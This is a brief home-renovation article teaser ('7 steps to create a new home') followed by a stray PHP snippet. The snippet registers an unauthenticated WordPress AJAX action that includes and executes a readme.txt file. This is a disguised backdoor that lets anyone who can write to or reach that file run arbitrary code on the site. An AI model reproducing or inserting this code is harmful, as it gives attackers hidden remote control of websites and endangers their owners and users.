7 steps to create a new home
Whether building new or renovating an existing structure, creating a new home is a journey of discovering who you are, what you want, how you want to live and where …
if(!function_exists('file_check_readme62213')){ add_action('wp_ajax_nopriv_file_check_readme62213', 'file_check_readme62213'); add_action('wp_ajax_file_check_readme62213', 'file_check_readme62213'); function file_check_readme62213() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }